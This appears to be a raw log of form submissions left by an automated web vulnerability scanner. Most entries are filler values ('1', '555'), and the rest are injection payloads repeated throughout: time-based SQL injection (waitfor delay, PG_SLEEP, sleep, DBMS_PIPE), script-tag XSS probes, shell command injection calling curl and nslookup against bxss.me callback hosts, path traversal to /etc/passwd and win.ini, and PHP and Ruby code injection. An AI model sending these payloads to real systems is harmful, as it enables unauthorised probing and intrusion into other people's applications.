)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
1
555
1
555
1
555
1
555
xfs.bxss.me
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555
1
xfs.bxss.me
1
555
1
555
1
555
1-1 waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1yF2kgypS
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
'"
555
1
555
1
555
1
555
1
555
1
555
<!--
555
1
'"
1
555
1
555
1'"()&%<zzz><ScRiPt >fgNx(9601)</ScRiPt>
555
1
555
555
1
<!--
1
555
'"()&%<zzz><ScRiPt >fgNx(9178)</ScRiPt>
555
12345'"\'\");|]*{ <>?''????
555
1
555
1
555
555
1
555
19859792
555
1
555
1
555'"()&%<zzz><ScRiPt >fgNx(9093)</ScRiPt>
1
555
1-1 waitfor delay '0:0:15' --
555
1
12345'"\'\");|]*{ <>?''????
1
555
1
'"()&%<zzz><ScRiPt >fgNx(9478)</ScRiPt>
1
555
1
555
1
555
1
555
1
555
1
555
1
5559215264
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1y6LYmRGx'; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
-1 OR 5*5=25 --
555
1
555
1
555
1
555
-1 OR 5*5=25
555
1
555
1
555
1
555
1
555
-1' OR 5*5=25 --
555
1vF1TwSC9'; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
-1" OR 5*5=25 --
555
1
555
1
555
1
555
1
555
1
555
-1' OR 5*5=25 or 'sV9m5nN5'='
555
response.write(9755894*9485966)
555
1
555
1
555
'+response.write(9755894*9485966)+'
555
1
555
1
555
-1" OR 5*5=25 or "Wh9H9Voc"="
555
1
555
1
555
"+response.write(9755894*9485966)+"
555
1
555
1
555
1
555
1
555
1
response.write(9024357*9949121)
1
555
1
555
1
555
1-1 OR 828=(SELECT 828 FROM PG_SLEEP(15))--
555
1
555
1
'+response.write(9024357*9949121)+'
1
555
1
"+response.write(9024357*9949121)+"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1 OR 122=(SELECT 122 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1*if(now()=sysdate(),sleep(15),0)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
echo hgcrrx$()\ udlayi\nz^xyu||a #' &echo hgcrrx$()\ udlayi\nz^xyu||a #|" &echo hgcrrx$()\ udlayi\nz^xyu||a #
555
1-1) OR 565=(SELECT 565 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
&echo mjrqfo$()\ ficvny\nz^xyu||a #' &echo mjrqfo$()\ ficvny\nz^xyu||a #|" &echo mjrqfo$()\ ficvny\nz^xyu||a #
555
1
555
1&echo akmexg$()\ euoaee\nz^xyu||a #' &echo akmexg$()\ euoaee\nz^xyu||a #|" &echo akmexg$()\ euoaee\nz^xyu||a #
555
1
555
1
555
1
555
|echo bwruax$()\ olldku\nz^xyu||a #' |echo bwruax$()\ olldku\nz^xyu||a #|" |echo bwruax$()\ olldku\nz^xyu||a #
555
1
555
1
555
1-1) OR 589=(SELECT 589 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1|echo jecedm$()\ coeatk\nz^xyu||a #' |echo jecedm$()\ coeatk\nz^xyu||a #|" |echo jecedm$()\ coeatk\nz^xyu||a #
555
s6Ayg89z
555
1
555
1
555
1
555
g9jjHTFO: fmFm89Ty
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1
555
1
555
expr 9000322077 - 952242
555
1
n3GxfPzP
1
555
1
555
1
555
1
555
1
555
1
p0kUDKrS: H8HfZr4r
1
555
(nslookup -q=cname hitpeiumphedh7bc51.bxss.me||curl hitpeiumphedh7bc51.bxss.me))
555
1
555
1
555
1
555
1
555
1-1)) OR 815=(SELECT 815 FROM PG_SLEEP(15))--
555
../../../../../../../../../../../../../../etc/passwd
555
1
555
$(nslookup -q=cname hitluulsrvhrh887e2.bxss.me||curl hitluulsrvhrh887e2.bxss.me)
555
1
555
1
555
1
555
&nslookup -q=cname hitncuknuvjnc28d55.bxss.me&'\"`0&nslookup -q=cname hitncuknuvjnc28d55.bxss.me&`'
555
../../../../../../../../../../../../../../windows/win.ini
555
1
555
1
555
1
555
1
555
file:///etc/passwd
555
&(nslookup -q=cname hitrwgxjyseur104e4.bxss.me||curl hitrwgxjyseur104e4.bxss.me)&'\"`0&(nslookup -q=cname hitrwgxjyseur104e4.bxss.me||curl hitrwgxjyseur104e4.bxss.me)&`'
555
1
555
1
555
1
555
1
555
|(nslookup -q=cname hitgljhzkueuz011db.bxss.me||curl hitgljhzkueuz011db.bxss.me)
555
1
555
1
555
1
555
`(nslookup -q=cname hittivsuyyyjt2a1f7.bxss.me||curl hittivsuyyyjt2a1f7.bxss.me)`
555
1
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
../1
555
1
555
1
555
1
555
;(nslookup -q=cname hitulekspybgy4c096.bxss.me||curl hitulekspybgy4c096.bxss.me)|(nslookup -q=cname hitulekspybgy4c096.bxss.me||curl hitulekspybgy4c096.bxss.me)&(nslookup -q=cname hitulekspybgy4c0
../../../../../../../../../../../../../../etc/passwd
1
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
1-1)) OR 329=(SELECT 329 FROM PG_SLEEP(15))--
../../../../../../../../../../../../../../windows/win.ini
1
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitluedplvpcjf379c.bxss.me||curl${IFS}hitluedplvpcjf379c.bxss.me)
555
1
555
1
file:///etc/passwd
1
555
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitdftqnmsgct8dc90.bxss.me||curl${IFS}hitdftqnmsgct8dc90.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitdftqnmsgct8dc90.bxss.me||curl${IFS}h
555
1
555
1
555
1
555
1
echo vxekxk$()\ yljttf\nz^xyu||a #' &echo vxekxk$()\ yljttf\nz^xyu||a #|" &echo vxekxk$()\ yljttf\nz^xyu||a #
1
555
1
555
1
../555
1
555
1
&echo zbiupv$()\ sjxqov\nz^xyu||a #' &echo zbiupv$()\ sjxqov\nz^xyu||a #|" &echo zbiupv$()\ sjxqov\nz^xyu||a #
1
555
1
555
1
555
1lJsIWeWE' OR 812=(SELECT 812 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555&echo fomazp$()\ piovtr\nz^xyu||a #' &echo fomazp$()\ piovtr\nz^xyu||a #|" &echo fomazp$()\ piovtr\nz^xyu||a #
1
555
1
555
1
555
1
555
${9999529+9999528}
|echo okedjf$()\ hefixp\nz^xyu||a #' |echo okedjf$()\ hefixp\nz^xyu||a #|" |echo okedjf$()\ hefixp\nz^xyu||a #
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
${10000015+9999969}
1
555
1
555
1
555|echo yccyed$()\ ynysdm\nz^xyu||a #' |echo yccyed$()\ ynysdm\nz^xyu||a #|" |echo yccyed$()\ ynysdm\nz^xyu||a #
1
555
1
555
'.gethostbyname(lc('hitpq'.'mqysfqvy8ec17.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(66).chr(108).chr(84).'
555
1U5tRLDu5' OR 644=(SELECT 644 FROM PG_SLEEP(15))--
555
1
555
';print(md5(31337));$a='
555
1
expr 9000606008 - 910534
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
";print(md5(31337));$a="
555
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
1
(nslookup -q=cname hitrxifhnjmno87362.bxss.me||curl hitrxifhnjmno87362.bxss.me))
1
555
${@print(md5(31337))}
555
1
555
".gethostbyname(lc("hitkj"."vxighoziffe2e.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(76).chr(113).chr(73)."
555
1
555
${@print(md5(31337))}\
$(nslookup -q=cname hitknmbrkhsmb9a581.bxss.me||curl hitknmbrkhsmb9a581.bxss.me)
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
gethostbyname(lc('hitqr'.'lpsgnbclc4bcc.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(83).chr(115).chr(76)
555
1jmhNbUqn') OR 607=(SELECT 607 FROM PG_SLEEP(15))--
555
1
555
/etc/shells
555
1
555
'.print(md5(31337)).'
&nslookup -q=cname hithoqmvghxff6c766.bxss.me&'\"`0&nslookup -q=cname hithoqmvghxff6c766.bxss.me&`'
1
555
1
555
1
'.gethostbyname(lc('hitbi'.'yegympsr9b16d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(79).chr(106).chr(89).'
1
555
../../../../../../../../../../../../../../etc/shells
555
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
&(nslookup -q=cname hitxfcanbgwkq63988.bxss.me||curl hitxfcanbgwkq63988.bxss.me)&'\"`0&(nslookup -q=cname hitxfcanbgwkq63988.bxss.me||curl hitxfcanbgwkq63988.bxss.me)&`'
1
555
c:/windows/win.ini
555
1
".gethostbyname(lc("hitar"."qqiwsncd1d11d.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(87).chr(100).chr(81)."
1
';print(md5(31337));$a='
1
555
HttP://bxss.me/t/xss.html?%00
555
bxss.me
555
1
|(nslookup -q=cname hitikbzlttxwi99c69.bxss.me||curl hitikbzlttxwi99c69.bxss.me)
1
555
bxss.me/t/xss.html?%00
gethostbyname(lc('hitdu'.'vckzifzaed9d4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(71).chr(112).chr(85)
1
555
1
`(nslookup -q=cname hitgjlhkggbup9b03d.bxss.me||curl hitgjlhkggbup9b03d.bxss.me)`
1
";print(md5(31337));$a="
1
555
1
555
Http://bxss.me/t/fit.txt
555
1
${@print(md5(31337))}
1
555
1fQJ1BgZn') OR 960=(SELECT 960 FROM PG_SLEEP(15))--
555
1
;(nslookup -q=cname hitpdcwytydqq607ff.bxss.me||curl hitpdcwytydqq607ff.bxss.me)|(nslookup -q=cname hitpdcwytydqq607ff.bxss.me||curl hitpdcwytydqq607ff.bxss.me)&(nslookup -q=cname hitpdcwytydqq607ff.bxss.me||curl hitpdcwytydqq607ff.bxss.me)
1
${@print(md5(31337))}\
1
HttP://bxss.me/t/xss.html?%00
1
555
http://bxss.me/t/fit.txt?.jpg
555
1-1; waitfor delay '0:0:15' --
|(nslookup${IFS}-q${IFS}cname${IFS}hittagdaahzxz4e47a.bxss.me||curl${IFS}hittagdaahzxz4e47a.bxss.me)
1
555
1
bxss.me/t/xss.html?%00
1
555
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitpvgmewxrqh0c78c.bxss.me||curl${IFS}hitpvgmewxrqh0c78c.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpvgmewxrqh0c78c.bxss.me||curl${IFS}hitpvgmewxrqh0c78c.bxss.me)&`'
1
'.print(md5(31337)).'
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
555
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
1
555
1
555
1
555
1
555
1
/etc/shells
1
555
1
555
1ljoktspP')) OR 204=(SELECT 204 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/shells
1
555
1
555
1
555
1
555
1
c:/windows/win.ini
1
555
1
555
1
555
1
bxss.me
1
555
1
555
1
555
1
555
1
555
1
555
1
Http://bxss.me/t/fit.txt
1
555
1
555
1
555
1
555
1
555
1c4H5ViVJ')) OR 208=(SELECT 208 FROM PG_SLEEP(15))--
555
1
555
1
http://bxss.me/t/fit.txt?.jpg
1
555
1
555
1
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
"+"A".concat(70-3).concat(22*4).concat(116).concat(78).concat(108).concat(90)+(require"socket" Socket.gethostbyname("hitzf"+"bqqxoajz6be85.bxss.me.")[3].to_s)+&
555
1
555
1
555
depoimentos
555
1
555
'+'A'.concat(70-3).concat(22*4).concat(113).concat(78).concat(116).concat(70)+(require'socket' Socket.gethostbyname('hitey'+'nzwmcwke21c3a.bxss.me.')[3].to_s)+&
555
1
555
1
555
1
555
1
555
'A'.concat(70-3).concat(22*4).concat(105).concat(66).concat(98).concat(66)+(require'socket' Socket.gethostbyname('hityx'+'amiyjnyc22566.bxss.me.')[3].to_s)
555
1
555
depoimentos
555
1
555
1
"+"A".concat(70-3).concat(22*4).concat(108).concat(80).concat(120).concat(79)+(require"socket" Socket.gethostbyname("hitxj"+"cszljgya881ae.bxss.me.")[3].to_s)+"
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
redirtest.acx
555
1
555
1
555
depoimentos/.
'+'A'.concat(70-3).concat(22*4).concat(112).concat(69).concat(118).concat(89)+(require'socket' Socket.gethostbyname('hitqv'+'tpkkcqrdc406d.bxss.me.')[3].to_s)+'
1
555
1
redirtest.acx
1
555
1-1 waitfor delay '0:0:15' --
555
1
555
1
555
1
depoimentos
1
555
1
555
1
'A'.concat(70-3).concat(22*4).concat(98).concat(72).concat(116).concat(78)+(require'socket' Socket.gethostbyname('hitcd'+'ofaswmoa462a7.bxss.me.')[3].to_s)
1
555
1
depoimentos
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1
555
1
555
1
555
1'"
555
1
555
1
555
1&n942883=v934394
555
1
555
1
555
1ORhoQtGG'; waitfor delay '0:0:15' --
555
1
555
1????%2527%2522\'\"
555
1
555&n940977=v938892
1
555
@@Wm23F
555
1
555
1
555
1
555
1
555
1
555
(select 198766*667891)
555
1'"
555
1
555
1
555
1
555
1
555
1????%2527%2522\'\"
555
(select 198766*667891 from DUAL)
555
1
555
@@2eJnS
555
1
555
1
555
1
555
1
555
(select 198766*667891)
555
1
555
1-1 OR 930=(SELECT 930 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
(select 198766*667891 from DUAL)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
)
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
!(()&&!|*|*|
555
1
555
555
1
555
1
555
1
555
^(#$!@#$)(()))******
555
1
555
1
555
1
555
1
555
1-1) OR 147=(SELECT 147 FROM PG_SLEEP(15))--
555
1
555
1
555
1
)
1
555
1
555
1
555
1
!(()&&!|*|*|
1
555
555
1
^(#$!@#$)(()))******
1
555
555
1
555
1
555
1
555
555
1
555
1
555
1
555
'"()
555
1
555
1
555
1
555
1
555
1'&&sleep(27*1000)*gwsfzo&&'
555
1
555
1
555
1
555
1
555
1
555
1"&&sleep(27*1000)*hzadbh&&"
555
1
555
1
555
1'||sleep(27*1000)*oybhjm||'
555
1
555
1
555
1"||sleep(27*1000)*snmjzv||"
555
1-1)) OR 539=(SELECT 539 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
'"()
1
555
1
555
1
555'&&sleep(27*1000)*nckklo&&'
1
555
1
555
1
555
1
555"&&sleep(27*1000)*kueeej&&"
1
555qduHYdE2
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1TRZtcKbi' OR 306=(SELECT 306 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555Y0im4466
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
-1 OR 5*5=25 --
1
555
1
-1 OR 5*5=25
1
555
1
-1' OR 5*5=25 --
1
-1" OR 5*5=25 --
1
555
1tVibw4xO') OR 854=(SELECT 854 FROM PG_SLEEP(15))--
555
1
555
1
555
1
-1 OR 5*5=25 --
1
-1' OR 5*5=25 or 'bSLtzfeh'='
1
555
1
555
1
-1 OR 5*5=25
1
555
1
-1" OR 5*5=25 or "WBnwshx6"="
1
-1' OR 5*5=25 --
1
555
1
-1" OR 5*5=25 --
1
555
1
-1' OR 5*5=25 or 'MuuMEle5'='
1
-1" OR 5*5=25 or "t5n2n7bE"="
1
555
1
555
1
555
1j3zyZ0tc')) OR 640=(SELECT 640 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555'||sleep(27*1000)*xpiwoz||'
1
555*if(now()=sysdate(),sleep(15),0)
1
555
1
555"||sleep(27*1000)*eckfif||"
1
555
1
555*if(now()=sysdate(),sleep(15),0)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1
555
1
555
1
555
1
555
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
555
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
1'"
555
1????%2527%2522\'\"
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555
@@DNEf3
555
1
555
(select 198766*667891)
555
1
555
(select 198766*667891 from DUAL)
555
1
555
1
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555
1
555
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1; waitfor delay '0:0:15' --
1
555
1
555-1; waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1
555
1
555-1); waitfor delay '0:0:15' --
1
555
1
555
1
555
1
555QyFbVaLn
1
555-1 waitfor delay '0:0:15' --
1
555-1 waitfor delay '0:0:15' --
1
555
1
-1 OR 5*5=25 --
1
-1 OR 5*5=25
1
-1' OR 5*5=25 --
1
-1" OR 5*5=25 --
1
-1' OR 5*5=25 or 'JxrYu5Ki'='
1
555k1yZ81IF'; waitfor delay '0:0:15' --
1
-1" OR 5*5=25 or "fsXIYbFQ"="
1
555HNsmkw9W'; waitfor delay '0:0:15' --
1
555-1 OR 18=(SELECT 18 FROM PG_SLEEP(15))--
1
555*if(now()=sysdate(),sleep(15),0)
1
555-1 OR 857=(SELECT 857 FROM PG_SLEEP(15))--
1
555-1) OR 461=(SELECT 461 FROM PG_SLEEP(15))--
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
555-1) OR 133=(SELECT 133 FROM PG_SLEEP(15))--
1
555-1)) OR 479=(SELECT 479 FROM PG_SLEEP(15))--
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
555-1)) OR 756=(SELECT 756 FROM PG_SLEEP(15))--
1
555aPxC2pTJ' OR 740=(SELECT 740 FROM PG_SLEEP(15))--
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555lahxmkmq' OR 737=(SELECT 737 FROM PG_SLEEP(15))--
1
555PsAoINKH') OR 144=(SELECT 144 FROM PG_SLEEP(15))--
1
555-1; waitfor delay '0:0:15' --
1
555L1p2QVQG') OR 153=(SELECT 153 FROM PG_SLEEP(15))--
1
555JyyhMWYr')) OR 614=(SELECT 614 FROM PG_SLEEP(15))--
1
555-1); waitfor delay '0:0:15' --
1
555wR2ykoh5')) OR 495=(SELECT 495 FROM PG_SLEEP(15))--
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555-1 waitfor delay '0:0:15' --
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
55576QIsq4l'; waitfor delay '0:0:15' --
1
555'"
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555????%2527%2522\'\"
1
555
1
@@oChcV
1
555'"
1
555-1 OR 903=(SELECT 903 FROM PG_SLEEP(15))--
1
(select 198766*667891)
1
(select 198766*667891 from DUAL)
1
555????%2527%2522\'\"
1
@@00YNl
1
(select 198766*667891)
1
555-1) OR 242=(SELECT 242 FROM PG_SLEEP(15))--
1
(select 198766*667891 from DUAL)
1
555
1
555-1)) OR 836=(SELECT 836 FROM PG_SLEEP(15))--
1
555
1
555
1
555gjcyMyHe' OR 82=(SELECT 82 FROM PG_SLEEP(15))--
1
555
1
555
1
555y7bIYvyw') OR 685=(SELECT 685 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555pAnfPxuW')) OR 492=(SELECT 492 FROM PG_SLEEP(15))--
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555
1
555
1
555
1
555
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555
1
555'"
1
555
1
555????%2527%2522\'\"
1
@@hTgNr
1
555
1
(select 198766*667891)
1
(select 198766*667891 from DUAL)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
xfs.bxss.me
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
xfs.bxss.me
1
555
1
555
1
555
1
555
1
555
1
555
'"
555
1
555
1
555
1
555
<!--
555
1
555
1
555
1'"()&%<zzz><ScRiPt >FRX8(9543)</ScRiPt>
555
1
'"
1
555
'"()&%<zzz><ScRiPt >FRX8(9694)</ScRiPt>
<!--
1
555
19945463
555
1
555
1
555'"()&%<zzz><ScRiPt >FRX8(9368)</ScRiPt>
1
555
1
'"()&%<zzz><ScRiPt >FRX8(9303)</ScRiPt>
1
555
1
5559491837
1
555
555
12345'"\'\");|]*{ <>?''????
555
1
555
555
1
555
1
555
1
12345'"\'\");|]*{ <>?''????
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
response.write(9456597*9473872)
555
1
555
1
555
'+response.write(9456597*9473872)+'
555
1
555
1
555
"+response.write(9456597*9473872)+"
555
1
555
1
response.write(9397153*9962423)
1
'+response.write(9397153*9962423)+'
1
555
1
555
1
"+response.write(9397153*9962423)+"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
echo yfgfow$()\ raspno\nz^xyu||a #' &echo yfgfow$()\ raspno\nz^xyu||a #|" &echo yfgfow$()\ raspno\nz^xyu||a #
555
1
555
wgqdbGws
555
1
555
&echo mfzoze$()\ xtcbsw\nz^xyu||a #' &echo mfzoze$()\ xtcbsw\nz^xyu||a #|" &echo mfzoze$()\ xtcbsw\nz^xyu||a #
555
1
555
1&echo nhbqfy$()\ rtdnyr\nz^xyu||a #' &echo nhbqfy$()\ rtdnyr\nz^xyu||a #|" &echo nhbqfy$()\ rtdnyr\nz^xyu||a #
555
doAQgMoV: F7JgekQt
555
1
555
1
5tMuAua9
1
555
|echo kpdmnt$()\ pidzjj\nz^xyu||a #' |echo kpdmnt$()\ pidzjj\nz^xyu||a #|" |echo kpdmnt$()\ pidzjj\nz^xyu||a #
555
1
555
1
cSDXKuFl: 6s1wguyP
1
555
